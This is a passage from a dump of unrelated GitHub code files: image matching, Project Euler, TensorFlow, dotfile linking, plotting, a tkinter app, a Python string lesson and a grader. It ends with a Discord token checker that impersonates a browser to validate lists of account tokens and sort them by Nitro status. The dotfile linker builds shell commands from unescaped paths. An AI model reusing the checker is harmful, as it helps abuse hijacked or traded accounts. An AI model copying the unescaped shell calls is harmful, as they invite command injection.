puzzle image\ntopLeft = maxLoc\nbotRight = (topLeft[0] + waldoWidth, topLeft[1] + waldoHeight)\nroi = puzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]]\n\n# construct a darkened transparent 'layer' to darken everything\n# in the puzzle except for waldo\nmask = np.zeros(puzzle.shape, dtype = \"uint8\")\npuzzle = cv2.addWeighted(puzzle, 0.25, mask, 0.75, 0)\n\n# put the original waldo back in the image so that he is\n# 'brighter' than the rest of the image\npuzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]] = roi\npuzzle=cv2.resize(puzzle, (0,0), fx=0.4, fy=0.4) \n# display the images\ncv2.imshow(\"Puzzle\", puzzle)\ncv2.imshow(\"Waldo\", waldo)\ncv2.waitKey(0)","repo_name":"thiraphong101/lesson-CV2-2-","sub_path":"09_Template Matching/waldo-master/find_waldo.py","file_name":"find_waldo.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33994523811","text":"\"\"\"This solves problem #89 of Project Euler (https://projecteuler.net).\n\nFor a number written in Roman numerals to be considered valid there are basic rules which\nmust be followed. 
Even though the rules allow some numbers to be expressed in more than one\nway there is always a \"best\" way of writing a particular number.\n\nFor example, it would appear that there are at least six ways of writing the number sixteen:\n\n IIIIIIIIIIIIIIII\n VIIIIIIIIIII\n VVIIIIII\n XIIIIII (valid)\n VVVI\n XVI (valid)\n\nHowever, according to the rules only XIIIIII and XVI are valid, and the last example is\nconsidered to be the most efficient, as it uses the least number of numerals.\n\nThe 11K text file, p089_roman.txt, contains one thousand numbers written in valid,\nbut not necessarily minimal, Roman numerals.\n\nTraditional Roman numerals are made up of the following denominations:\n\n I = 1, V = 5, X = 10, L = 50, C = 100, D = 500, M = 1000\n\n- Numerals must be arranged in descending order of size.\n- M, C, and X cannot be equalled or exceeded by smaller denominations.\n- D, L, and V can each only appear once.\n\nIn addition to the three rules given above, if subtractive combinations are used then the\nfollowing four rules must be followed.\n\n- Only one I, X, and C can be used as the leading numeral in part of a subtractive pair.\n- I can only be placed before V and X.\n- X can only be placed before L and C.\n- C can only be placed before D and M.\n\nIt is also expected, but not required, that higher denominations should be used whenever\npossible.\n\nFind the number of characters saved by writing each of these in their minimal form.\n\nNote: You can assume that all the Roman numerals in the file contain no more than four\nconsecutive identical units.\n\"\"\"\n\nfrom roman_numbers import decimal_to_roman, relaxed_roman_to_decimal\n\nNUMBERS = 'p089_roman.txt'\n\n\ndef read_file(fn):\n with open(fn) as fp:\n numbers = (line.strip() for line in fp.readlines())\n return numbers\n\n\ndef optimized(rn):\n return decimal_to_roman(relaxed_roman_to_decimal(rn))\n\n\ndef attempt():\n numbers = read_file(NUMBERS)\n\n saved_characters = 0\n for roman_number in numbers:\n pre_length = len(roman_number)\n rn = optimized(roman_number)\n post_length = len(rn)\n saved_characters += (pre_length - post_length)\n\n print('Solution =', saved_characters)\n\n\ndef run_application():\n import time\n start = time.time()\n attempt()\n print('Runtime =', time.time() - start, 'seconds')\n\n\nif __name__ == '__main__':\n run_application()\n\n# last line of code\n","repo_name":"techrabbit58/ProjectEuler","sub_path":"problem_0089.py","file_name":"problem_0089.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3424575642","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 22 00:39:18 2020\n\n@author: nikbakht\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Layer\nimport numpy as np\n\nclass Data(Layer):\n def __init__(self,Nap,Nuser, **kwargs):\n super(Data, self).__init__(**kwargs)\n self.EX=100\n self.EY=100\n self.exponent=3.8\n self.shadowing_sigma=0;\n self.Zuser=0;\n self.Zap=1;\n self.Nap=Nap\n self.Nuser=Nuser\n def call(self,batch_num,beta_open_loop=1):\n\n # Xin = tf.zeros([batch_num,2*(self.Nuser+self.Nap)],dtype='float32')\n G = tf.zeros([batch_num,self.Nap,self.Nuser],dtype='float32')\n power_propotional = tf.zeros([batch_num,self.Nap,self.Nuser],dtype='float32')\n # i=0;\n # while i {1}\\n'.format(linkname, target))\n all_link = set(all_link)\n\n with open(linkrec, 'w') as f:\n f.writelines(all_link)\n\ndef do_actions(actions, fake_operate=True):\n def 
rm(file):\n if fake_operate:\n print('rm ', file)\n else:\n os.system('rm -rf {0}'.format(file))\n\n def link(linkname, target):\n parent_dir = os.path.dirname(os.path.realpath(linkname))\n if fake_operate:\n if os.path.realpath(linkname) == target:\n return False\n\n if os.path.lexists(linkname):\n postfix = str(datetime.timestamp(datetime.now()))\n print('mv {0} {1}'.format(linkname, linkname + '.' + postfix))\n\n print('mkdir -p {0}'.format(parent_dir))\n print('ln -s {0} {1}'.format(target, linkname))\n else:\n if os.path.realpath(linkname) == target:\n return False\n\n if os.path.lexists(linkname):\n postfix = str(datetime.timestamp(datetime.now()))\n os.system('mv {0} {1}'.format(linkname, linkname + '.' + postfix))\n\n os.system('mkdir -p {0}'.format(parent_dir))\n os.system('ln -s {0} {1}'.format(target, linkname))\n write_linkrec(linkname, target)\n\n def linkdir(linkname, target):\n parent_dir = os.path.dirname(os.path.realpath(linkname))\n if fake_operate:\n if os.path.realpath(linkname) == target:\n return False\n\n if os.path.lexists(linkname):\n postfix = str(datetime.timestamp(datetime.now()))\n print('mv {0} {1}'.format(linkname, linkname + '.' + postfix))\n\n print('mkdir -p {0}'.format(parent_dir))\n print('ln -s {0} {1}'.format(target, linkname))\n else:\n if os.path.realpath(linkname) == target:\n return False\n\n if os.path.lexists(linkname):\n postfix = str(datetime.timestamp(datetime.now()))\n os.system('mv {0} {1}'.format(linkname, linkname + '.' + postfix))\n\n os.system('mkdir -p {0}'.format(parent_dir))\n os.system('ln -s {0} {1}'.format(target, linkname))\n write_linkrec(linkname, target)\n\n local_mappings = locals()\n for action in actions:\n cmd_str = action[0].replace('-', '_')\n if cmd_str not in local_mappings:\n cprint('unknown cmd: {0}'.format(cmd_str), color='red')\n continue\n local_mappings[cmd_str](*action[1:])\n\n\ndef remove_broken_symlinks_stack(created_symlinks):\n results = []\n for linkname, dst in created_symlinks.items():\n if os.path.lexists(linkname) \\\n and os.path.islink(linkname) \\\n and os.path.realpath(linkname) == dst \\\n and not os.path.lexists(dst):\n results.append(('rm', linkname))\n return results\n\n\ndef make_symlink_stack(origdir, dstdir, top_level=True):\n results = []\n if dstdir.endswith('/'):\n dstdir = dstdir[:-1]\n if origdir.endswith('/'):\n origdir = origdir[:-1]\n\n if top_level:\n for dirpath, dirnames, targets in os.walk(origdir):\n for dirname in dirnames:\n linkname = dirname\n if not dirname.startswith('.'):\n linkname = '.' + linkname\n dirname = os.path.join(dirpath, dirname)\n linkname = os.path.join(dstdir, linkname)\n results.append(('linkdir', linkname, dirname))\n for target in targets:\n linkname = target\n if not target.startswith('.'):\n linkname = '.' + linkname\n target = os.path.join(dirpath, target)\n linkname = os.path.join(dstdir, linkname)\n results.append(('link', linkname, target))\n break\n else:\n for dirpath, dirnames, targets in os.walk(origdir):\n for target in targets:\n linkname = target\n target = os.path.join(dirpath, target)\n linkdir_name = dirpath[len(origdir)+1:]\n if not linkdir_name.startswith('.'):\n linkdir_name = '.' 
+ linkdir_name\n linkname = os.path.join(linkdir_name, linkname)\n linkname = os.path.join(dstdir, linkname)\n\n results.append(('link', linkname, target))\n\n\n return results\n\n\ndef remove_bad_symlink(linkrec):\n # Remove broken (dangling) symlinks recorded in the link-record file\n if os.path.exists(linkrec):\n with open(linkrec) as f:\n created_links = dict((line.strip().split(' -> ')) for line in f.readlines())\n remove_actions = remove_broken_symlinks_stack(created_links)\n do_actions(remove_actions)\n\nif __name__ == '__main__':\n LINKDOT_DIRNAME = ''\n HOME_PATH = os.environ['HOME']\n BASE_PATH = os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0])))\n LINKDOT_PATH = os.path.join(BASE_PATH, LINKDOT_DIRNAME)\n\n linkrec = os.path.join(BASE_PATH, LINKREC)\n remove_bad_symlink(linkrec)\n actions = make_symlink_stack(LINKDOT_PATH, HOME_PATH)\n do_actions(actions)\n actions = make_symlink_stack(LINKDOT_PATH, HOME_PATH, top_level=False)\n","repo_name":"qytz/oh-my-dot","sub_path":"pylibs/linkdot.py","file_name":"linkdot.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14093349673","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib\n\nfont = {'family' : 'normal', 'weight' : 'normal', 'size' : 13} \nmatplotlib.rc('font', **font)\n\ndata1='model2x2_1x0_l5w200_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\ndata2='model2x2_1x0_l1w5_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\ndata3='model2x2_1x0_l0w1_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\n\ndata4='model1x1_1x0_l5w200_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\ndata5='model1x1_1x0_l1w5_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\ndata6='model1x1_1x0_l0w1_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\n\ndata7='model2x2_1x0_l5w200_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact_tanh.txt'\n\npath='../data/data_ADI_NOTgcr_EXP3_Dp_1M10_res05'\nfile_grid = path+'/Precon5_H_exp3_time0_codes_FT_bits52.txt'\nxcoord, ycoord=np.loadtxt( file_grid, usecols=(0,1), unpack=True)\n\nlatitudes=np.zeros(32)\nlatitudes=sorted(set(ycoord), reverse=True)\nprint(latitudes)\n\nplt.ylim(3*10.0**(-5.0), 2*10.0**(-1.0))\nLat1, base1, baseval1, remainder1 =np.loadtxt( \"truth_diff_METRICnorm_iter_1_pseut_Lats.txt\", usecols=(0,1,2,3), unpack=True)\nplt.plot(latitudes, remainder1[0:32]/base1[0:32], label ='Implicit Richardson, Iteration 1')\n\nLat2, base2, remainder2 =np.loadtxt( data1, usecols=(0,1,3), unpack=True)\nplt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L5N200, 5x5, 250 Epochs',color='r', linestyle='dotted')\n\n\nLat2, base2, remainder2 =np.loadtxt( data2, usecols=(0,1,3), unpack=True)\nplt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L1N5, 5x5',color='r', linestyle='--')\nLat2, base2, remainder2 =np.loadtxt( data3, usecols=(0,1,3), unpack=True)\nplt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L0N0, 5x5',color='r', linestyle='-')\n\nLat2, base2, remainder2 =np.loadtxt( data6, usecols=(0,1,3), unpack=True)\nplt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L0N0, 3x3',color='g', linestyle='-')\n\n#Lat2, base2, remainder2 =np.loadtxt( data1, usecols=(0,1,3), unpack=True)\n#plt.plot(latitudes[14], remainder2[32]/base2[32], 'r*',label ='L5N200, 5x5; 5xEpochs')\n\n#Lat2, base2, remainder2 =np.loadtxt( data7, 
usecols=(0,1,3), unpack=True)\n#plt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L5N200, 5x5; tanh',color='C1', linestyle='dotted')\n\nplt.xlabel(\"Latitude\")\nplt.ylabel(\"Relative MAE Decrease\")\n\nplt.legend(loc='upper left', prop={'size':9}, bbox_to_anchor=(0.2,1.06), framealpha=1)\n\nplt.yscale('log')\nplt.savefig('lineplot_iter1_comparison.pdf', bbox_inches=0)\n\n\n \n","repo_name":"JanAckmann/MLPrecon","sub_path":"plot_Figure_2_a.py","file_name":"plot_Figure_2_a.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"36484358305","text":"import os\n\nfrom typing import List, Dict\nfrom pathlib import Path\n\nfrom modules import shared, scripts\nfrom preload import default_ddp_path\nfrom tagger.preset import Preset\nfrom tagger.interrogator import Interrogator, DeepDanbooruInterrogator, WaifuDiffusionInterrogator\n\npreset = Preset(Path(scripts.basedir(), 'presets'))\n\ninterrogators: Dict[str, Interrogator] = {}\n\n\ndef refresh_interrogators() -> List[str]:\n global interrogators\n interrogators = {\n 'wd14-convnextv2-v2': WaifuDiffusionInterrogator(\n 'wd14-convnextv2-v2',\n repo_id='SmilingWolf/wd-v1-4-convnextv2-tagger-v2',\n revision='v2.0'\n ),\n 'wd14-vit-v2': WaifuDiffusionInterrogator(\n 'wd14-vit-v2',\n repo_id='SmilingWolf/wd-v1-4-vit-tagger-v2',\n revision='v2.0'\n ),\n 'wd14-convnext-v2': WaifuDiffusionInterrogator(\n 'wd14-convnext-v2',\n repo_id='SmilingWolf/wd-v1-4-convnext-tagger-v2',\n revision='v2.0'\n ),\n 'wd14-swinv2-v2': WaifuDiffusionInterrogator(\n 'wd14-swinv2-v2',\n repo_id='SmilingWolf/wd-v1-4-swinv2-tagger-v2',\n revision='v2.0'\n ),\n 'wd14-convnextv2-v2-git': WaifuDiffusionInterrogator(\n 'wd14-convnextv2-v2',\n repo_id='SmilingWolf/wd-v1-4-convnextv2-tagger-v2',\n ),\n 'wd14-vit-v2-git': WaifuDiffusionInterrogator(\n 'wd14-vit-v2-git',\n repo_id='SmilingWolf/wd-v1-4-vit-tagger-v2'\n ),\n 'wd14-convnext-v2-git': WaifuDiffusionInterrogator(\n 'wd14-convnext-v2-git',\n repo_id='SmilingWolf/wd-v1-4-convnext-tagger-v2'\n ),\n 'wd14-swinv2-v2-git': WaifuDiffusionInterrogator(\n 'wd14-swinv2-v2-git',\n repo_id='SmilingWolf/wd-v1-4-swinv2-tagger-v2'\n ),\n 'wd14-vit': WaifuDiffusionInterrogator(\n 'wd14-vit',\n repo_id='SmilingWolf/wd-v1-4-vit-tagger'),\n 'wd14-convnext': WaifuDiffusionInterrogator(\n 'wd14-convnext',\n repo_id='SmilingWolf/wd-v1-4-convnext-tagger'\n ),\n }\n\n # load deepdanbooru project\n os.makedirs(\n getattr(shared.cmd_opts, 'deepdanbooru_projects_path', default_ddp_path),\n exist_ok=True\n )\n\n for path in os.scandir(shared.cmd_opts.deepdanbooru_projects_path):\n if not path.is_dir():\n continue\n\n if not Path(path, 'project.json').is_file():\n continue\n\n interrogators[path.name] = DeepDanbooruInterrogator(path.name, path)\n\n return sorted(interrogators.keys())\n\n\ndef split_str(s: str, separator=',') -> List[str]:\n return [x.strip() for x in s.split(separator) if x]\n","repo_name":"toriato/stable-diffusion-webui-wd14-tagger","sub_path":"tagger/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":1063,"dataset":"github-code","pt":"52"} +{"seq_id":"19707820922","text":"from tkinter import Menu, messagebox, ttk\n\nfrom pyimg.config.interface_info import InterfaceInfo\nfrom pyimg.menus.border_menu import BorderMenu\nfrom pyimg.menus.filter_menu import FilterMenu\nfrom pyimg.menus.info_menu import InfoImageMenu\nfrom pyimg.menus.io_menu import 
ImageMenu\nfrom pyimg.menus.line_menu import LineMenu\nfrom pyimg.menus.noise_menu import NoiseImageMenu\nfrom pyimg.menus.point_operators import PointOperatorMenu\nfrom pyimg.menus.threshold_menu import ThresholdMenu\n\n\nclass App:\n    def __init__(self):\n        self.interface = InterfaceInfo.get_instance()\n        root = self.interface.get_root()\n        self.interface.configure()\n        self.interface.load_frames()\n        self.load_footer_buttons(self.interface)\n        self.load_menu(root)\n\n    def load_footer_buttons(self, interface):\n        exit_program_btn = ttk.Button(\n            interface.footer_frame,\n            text=\"Exit Program\",\n            command=lambda: self.ask_quit(root),\n        )\n        exit_program_btn.grid(column=0, row=0)\n        clean_window_btn = ttk.Button(\n            interface.footer_frame,\n            text=\"Clean buttons\",\n            command=lambda: interface.delete_widgets(interface.buttons_frame),\n        )\n        clean_window_btn.grid(column=1, row=0)\n        clean_window_btn = ttk.Button(\n            interface.footer_frame,\n            text=\"Clean image\",\n            command=interface.remove_images,\n        )\n        clean_window_btn.grid(column=2, row=0)\n\n    def ask_quit(self, root):\n        if messagebox.askokcancel(\"Quit\", \"Are you sure you want to quit?\"):\n            root.destroy()\n\n    def load_menu(self, root):\n        menubar = Menu(root)\n        root.config(menu=menubar)\n        image_menu = ImageMenu(menubar=menubar, interface=self.interface)\n        InfoImageMenu(menubar=menubar, image_io=image_menu.image_io)\n        PointOperatorMenu(menubar=menubar, image_io=image_menu.image_io)\n        NoiseImageMenu(menubar=menubar, image_io=image_menu.image_io)\n        FilterMenu(menubar=menubar, image_io=image_menu.image_io)\n        BorderMenu(menubar=menubar, image_io=image_menu.image_io)\n        LineMenu(menubar=menubar, image_io=image_menu.image_io)\n        ThresholdMenu(menubar=menubar, image_io=image_menu.image_io)\n\n\napp = App()\nroot = InterfaceInfo.get_instance().get_root()\n# main loop\nroot.mainloop()\n","repo_name":"levensworth/imgtools","sub_path":"pyimg/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28110434038","text":"\n'''\n* Strings (String)\n\n- A collection of character data made by wrapping a\n sequence of single characters in quotes ('', \"\").\n- Whatever kind of data is placed inside the quotes is treated as text.\n- Any character in the world can be stored, and there is no length limit. (Python 3 supports UTF-8)\n'''\n\n# Target text: 나는 그에게 \"도와줘!\" 라고 말했다.\n# The escape character (\\) lets a quote be written as a literal character.\ns1 = \"나는 그에게 \\\"도와줘!\\\" 라고 말했다.\"\n\n# Let's get together!\ns2 = 'Let\\'s get together!'\n\nfile1 = 'C:\\\\temp\\\\new.jpg'\nprint(file1)\n\n# Prefixing a string with r makes it a raw string:\n# escape characters are not applied. (raw char sequence)\nfile2 = r'C:\\temp\\new.jpg'\nprint(file2)\n\nanthem = '''\n동해물과 백두산이 마르고 닳도록\n하느님이 보우하사 우리나라만세\n무궁화 삼천리 화려강산\n대한사람 대한으로 길이 보전하세\n'''\nprint(anthem)\n\n# Appending \\ at the end of a line has a line-continuation effect.\nanthem2 = '''\n동해물과 백두산이 마르고 닳도록 \\\n하느님이 보우하사 우리나라만세 \\\n무궁화 삼천리 화려강산 \\\n대한사람 대한으로 길이 보전하세\n'''\nprint(anthem2)\n\n'''\n* String operations\n\n- Python supports addition and multiplication operations on strings.\n- Addition joins strings together into one (concatenation).\n'''\ns3 = '오늘 저녁은 '\ns4 = '치킨입니다!'\nprint(s3 + s4 + ' 와 맛있겠다~')\n\n'''\n- Python also supports multiplication for strings.\n- The multiplication operator (*) repeats a string the given number of times.\n'''\n\nprint('배고파' * 4)\nprint('-' * 30)\n\n# print(s3 * 1.7) (x)\n# print(s3 * s4) (x)
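\n# Note (illustrative extra example, not part of the original lesson): the repeat\n# count must be an int, so print(s3 * int(2.0)) works while print(s3 * 2.0) raises a TypeError.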
data_type_str.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"139897338","text":"#!/usr/bin/env python3\nimport unittest, random, sys, copy, argparse, inspect\nimport numpy as np\nfrom graderUtil import graded, CourseTestRunner, GradedTestCase\n\n# Import student submission\nimport submission\nimport util\n\n#############################################\n# HELPER FUNCTIONS FOR CREATING TEST INPUTS #\n#############################################\n\n#########\n# TESTS #\n#########\nclass Test_2a(GradedTestCase):\n def setUp(self):\n np.random.seed(42)\n _, self.t_test = util.load_dataset('test.csv', label_col='t', add_intercept=True)\n \n @graded()\n def test_0(self):\n \"\"\"2a-0-basic: Fully Observed Binary Classifier (accuracy check on test set [>96%])\"\"\"\n p_test = submission.fully_observed_predictions('train.csv', 'test.csv', 'posonly_true_pred.txt', 'posonly_true_pred.png')\n self.assertTrue(p_test is not None, \"full predictions are None\")\n yhat = p_test > 0.5\n accuracy = np.mean((yhat == 1) == (self.t_test == 1))\n print('Fully Observed Binary Classifier Accuracy: {}'.format(accuracy * 100))\n self.assertTrue(accuracy * 100 >= 96)\n\nclass Test_2b(GradedTestCase):\n def setUp(self):\n np.random.seed(42)\n _, self.t_test = util.load_dataset('test.csv', label_col='t', add_intercept=True)\n \n @graded()\n def test_0(self):\n \"\"\"2b-0-basic: Naive Method Partial Labels Binary Classifier (accuracy check on test set [>=50%])\"\"\"\n p_test, _ = submission.naive_partial_labels_predictions('train.csv', 'test.csv', 'posonly_naive_pred.txt', 'posonly_naive_pred.png')\n self.assertTrue(p_test is not None, \"naive predictions are None\")\n yhat = p_test > 0.5\n accuracy = np.mean((yhat == 1) == (self.t_test == 1))\n print('Fully Observed Binary Classifier Accuracy: {}'.format(accuracy * 100))\n self.assertTrue(accuracy * 100 >= 50)\n\nclass Test_2f(GradedTestCase):\n def setUp(self):\n np.random.seed(42)\n _, self.t_test = util.load_dataset('test.csv', label_col='t', add_intercept=True)\n \n @graded()\n def test_0(self):\n \"\"\"2f-0-basic: Alpha estimation for binary classifier correction\"\"\"\n p_test, clf = submission.naive_partial_labels_predictions('train.csv', 'test.csv', 'posonly_naive_pred.txt', 'posonly_naive_pred.png')\n self.assertTrue(clf is not None, \"Logistic Regression Classifier from naive solution is None\")\n alpha = submission.find_alpha_and_plot_correction(clf,'valid.csv', 'test.csv', 'posonly_adjusted_pred.txt', 'posonly_adjusted_pred.png', p_test)\n self.assertTrue(alpha is not None, \"Correct alpha is None\")\n print('Alpha Correction Value: {}'.format(alpha))\n self.assertTrue(alpha > 0.16)\n\n @graded()\n def test_1(self):\n \"\"\"2f-1-basic: Alpha Corrected Binary Classification (accuracy check on test set [>93%])\"\"\"\n p_test, clf = submission.naive_partial_labels_predictions('train.csv', 'test.csv', 'posonly_naive_pred.txt', 'posonly_naive_pred.png')\n self.assertTrue(clf is not None, \"Logistic Regression Classifier from naive solution is None\")\n alpha = submission.find_alpha_and_plot_correction(clf,'valid.csv', 'test.csv', 'posonly_adjusted_pred.txt', 'posonly_adjusted_pred.png', p_test)\n self.assertTrue(alpha is not None, \"Correct alpha is None\")\n\n yhat = (p_test/alpha) > 0.5\n accuracy = np.mean((yhat == 1) == (self.t_test == 1))\n print('Fully Observed Binary Classifier Accuracy: {}'.format(accuracy * 100))\n self.assertTrue(accuracy * 100 >= 
93)\n\ndef getTestCaseForTestID(test_id):\n question, part, _ = test_id.split('-')\n g = globals().copy()\n for name, obj in g.items():\n if inspect.isclass(obj) and name == ('Test_'+question):\n return obj('test_'+part)\n\nif __name__ == '__main__':\n # Parse for a specific test\n parser = argparse.ArgumentParser()\n parser.add_argument('test_case', nargs='?', default='all')\n test_id = parser.parse_args().test_case\n\n assignment = unittest.TestSuite()\n if test_id != 'all':\n assignment.addTest(getTestCaseForTestID(test_id))\n else:\n assignment.addTests(unittest.defaultTestLoader.discover('.', pattern='grader.py'))\n CourseTestRunner().run(assignment)","repo_name":"M1ddleton/Stanford-Machine-LearningXCS229","sub_path":"XCS229-PS2-master/src-incomplete/grader.py","file_name":"grader.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4679533268","text":"import httpx, requests, os, base64\nimport colorama\nfrom colorama import Fore, init\nfrom pathlib import Path\nred = Fore.RED\ngreen = Fore.GREEN\nwhite = Fore.WHITE\ncyan = Fore.CYAN\n\ndef cls(): #clears the terminal\n os.system('cls' if os.name=='nt' else 'clear')\n \ndef get_super_properties():\n properties = '''{\"os\":\"Windows\",\"browser\":\"Chrome\",\"device\":\"\",\"system_locale\":\"en-GB\",\"browser_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\",\"browser_version\":\"95.0.4638.54\",\"os_version\":\"10\",\"referrer\":\"\",\"referring_domain\":\"\",\"referrer_current\":\"\",\"referring_domain_current\":\"\",\"release_channel\":\"stable\",\"client_build_number\":102113,\"client_event_source\":null}'''\n properties = base64.b64encode(properties.encode()).decode()\n return properties\n\ndef get_fingerprint(s):\n try:\n fingerprint = s.get(f\"https://discord.com/api/v9/experiments\", timeout=5).json()[\"fingerprint\"]\n return fingerprint\n except Exception as e:\n return \"Error\"\n\ndef get_cookies(s, url):\n try:\n cookieinfo = s.get(url, timeout=5).cookies\n dcf = str(cookieinfo).split('__dcfduid=')[1].split(' ')[0]\n sdc = str(cookieinfo).split('__sdcfduid=')[1].split(' ')[0]\n return dcf, sdc\n except:\n return \"\", \"\"\n\ndef get_proxy():\n pass\n\n\ndef get_headers(token):\n while True:\n s = httpx.Client(proxies=get_proxy())\n dcf, sdc = get_cookies(s, \"https://discord.com/\")\n fingerprint = get_fingerprint(s)\n if fingerprint != \"Error\":\n break\n super_properties = get_super_properties()\n headers = {\n 'authority': 'discord.com',\n 'method': 'POST',\n 'path': '/api/v9/users/@me/channels',\n 'scheme': 'https',\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate',\n 'accept-language': 'en-US',\n 'authorization': token,\n 'cookie': f'__dcfduid={dcf}; __sdcfduid={sdc}',\n 'origin': 'https://discord.com',\n 'sec-ch-ua': '\"Google Chrome\";v=\"95\", \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"Windows\"',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',\n 'x-debug-options': 'bugReporterEnabled',\n 'x-fingerprint': fingerprint,\n 'x-super-properties': super_properties,\n }\n return s, headers\n\ndef validate_token(s, headers):\n check = s.get(f\"https://discord.com/api/v9/users/@me\", 
headers=headers)\n    if check.status_code == 200:\n        profile_name = check.json()[\"username\"]\n        profile_discrim = check.json()[\"discriminator\"]\n        profile_of_user = f\"{profile_name}#{profile_discrim}\"\n        return profile_of_user\n    else:\n        return False\n\ndef find_token(token):\n    if ':' in token:\n        token_chosen = None\n        tokensplit = token.split(\":\")\n        for thing in tokensplit:\n            if '@' not in thing and '.' in thing and len(\n                    thing) > 30: \n                token_chosen = thing\n                break\n        if token_chosen == None:\n            print(red + \"Error finding token\" + white)\n            return None\n        else:\n            return token_chosen\n\n\n    else:\n        return token\n    \ndef removeToken(token: str, file:str):\n    with open(file, \"r\") as f:\n        fulltokens = f.read().splitlines()\n    # rebuild the kept list instead of calling remove() while iterating,\n    # which skips entries and crashes on None returned by find_token\n    Tokens = [t for t in (find_token(j) for j in fulltokens)\n              if t is not None and len(t) >= 5 and t != token]\n    open(file, \"w\").write(\"\\n\".join(Tokens))\n\ndef get_all_tokens(filename):\n    all_tokens = []\n    with open(filename, 'r') as f:\n        for line in f.readlines():\n            token = line.strip()\n            token = find_token(token)\n            if token != None:\n                all_tokens.append(token)\n\n    return all_tokens\n\ndef checkEmpty(file):\n    mypath = Path(file)\n\n    if mypath.stat().st_size == 0:\n        return True\n    else:\n        return False\n
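# Aside: what find_token() above extracts from a typical "email:password:token"
# combo line. The e-mail, password, and token below are made-up placeholders;
# the inline filter restates the function's rule (no '@', contains '.', len > 30).
combo = "user@example.com:hunter2:MTIzNDU2Nzg5MDEyMzQ1Njc4.XXXXXX.abcdefghijklmnopqrstuvwxyz123456"
candidates = [seg for seg in combo.split(":")
              if "@" not in seg and "." in seg and len(seg) > 30]
print(candidates[0] if candidates else None)  # prints the token segment only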
\ndef nitrochecker():\n\n    three_m_working = 0\n    one_m_working = 0\n\n    three_m_used = 0\n    one_m_used = 0\n\n    three_m_nonitro = 0\n    one_m_nonitro = 0\n\n    three_m_invalid = 0\n    one_m_invalid = 0\n\n    three_m_locked = 0\n    one_m_locked = 0\n\n    three_m_tokens = get_all_tokens(\"3m_tokens.txt\")\n    one_m_tokens = get_all_tokens(\"1m_tokens.txt\")\n    print(\"Checking 3 Months Nitro Tokens\")\n\n    if checkEmpty(\"3m_tokens.txt\"):\n        print(red + \"No Stock To Check\" + white)\n\n    else:\n\n        for token in three_m_tokens: \n            file = \"3m_tokens.txt\"\n            s, headers = get_headers(token)\n            profile = validate_token(s, headers)\n\n            if profile != False:\n                boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\n\n                if boost_data.status_code == 403:\n                    print(red + f\" ✗ {white}{token} - {profile}{red} [LOCKED]\" + white)\n                    removeToken(token, file)\n                    three_m_locked += 1\n                # parenthesize the status check: without it a 201 with an empty\n                # body would pass and boost_data.json()[0] below would raise\n                if len(boost_data.json()) != 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\n                    if boost_data.json()[0]['cooldown_ends_at'] != None:\n                        print(red + f\" ✗ {white}{token} - {profile}{red} [USED]\" + white)\n                        removeToken(token, file)\n                        three_m_used += 1\n                if len(boost_data.json()) == 0:\n                    removeToken(token, file)\n                    print(f\"{red} ✗ {white}{token} - {profile}{red} [NO NITRO]\" + white)\n                    three_m_nonitro += 1\n                else:\n                    if len(boost_data.json()) != 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\n                        if boost_data.json()[0]['cooldown_ends_at'] == None:\n\n                            print(f\"{green} ✓ {white}{token} - {profile}{green} [WORKING]\" + white)\n                            three_m_working += 1\n            else:\n                print(red + f\" ✗ {white}{token}{red} [INVALID]\" + white)\n                